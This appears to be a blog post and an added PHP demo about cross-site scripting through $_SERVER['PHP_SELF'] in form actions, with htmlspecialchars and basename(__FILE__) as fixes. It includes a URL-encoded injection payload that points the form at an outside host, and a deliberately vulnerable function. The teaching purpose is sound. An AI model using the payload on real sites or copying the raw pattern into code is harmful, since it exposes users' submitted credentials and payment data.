It's pretty common for PHP developers to use $_SERVER['PHP_SELF'] to grab the destination page when using a form action. A common setup could look something like this:
http://example.com/script.php

<form action="<? echo $_SERVER['PHP_SELF']; ?>" method="post">
...form elements...
</form>

Now, the problem is that you can inject code into the form action very easily by modifying the page URL to something like this (the line break is only there to keep this page readable):
http://example.com/script.php/%22%3E%3Cform%3E%3Cform%20
action=%22http://othersite.com/phpscript.php

That causes your form to end up looking like this:
<form action="/script.php/"><form>
<form action="http://othersite.com/phpscript.php" method="post">
...form elements...
</form>
Nasty! That would cause the form to submit to a completely different site (and possibly transmit passwords, credit card info, etc.).
I was leaving the action blank to get around this, but I've since found that Safari has a few issues with blank fields. So one of the best ways to get around this, it seems, is to use the following instead of PHP_SELF:
basename(__FILE__);
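As an added example (not code from the original post), here is the vulnerable action rendered beside two safe versions. The PHP_SELF value is constructed to match what the URL above produces, and the file name printed by the last function is whatever you save this script as.

```php
<?php
// Constructed value: what $_SERVER['PHP_SELF'] holds after the URL in the post
// is requested (the path info after script.php is included, URL-decoded).
$_SERVER['PHP_SELF'] = '/script.php/"><form><form action="http://othersite.com/phpscript.php';

function action_raw(): string
{
    // Vulnerable: PHP_SELF is echoed straight into an HTML attribute, so the
    // injected quote and angle brackets close the attribute and open new tags.
    return '<form action="' . $_SERVER['PHP_SELF'] . '" method="post">';
}

function action_escaped(): string
{
    // Hardened: the same value, HTML-escaped. Quotes become &quot; and angle
    // brackets become &lt;/&gt;, so the attribute cannot be broken out of.
    $self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

function action_basename(): string
{
    // The fix from the post: only this script's own file name, which the
    // request URL cannot influence.
    return '<form action="' . basename(__FILE__) . '" method="post">';
}

echo action_raw(), "\n";
echo action_escaped(), "\n";
echo action_basename(), "\n";
```

Escaping with htmlspecialchars() is the general fix for any untrusted value placed in an attribute; basename(__FILE__) is a relative URL, so the browser resolves it against the current page path.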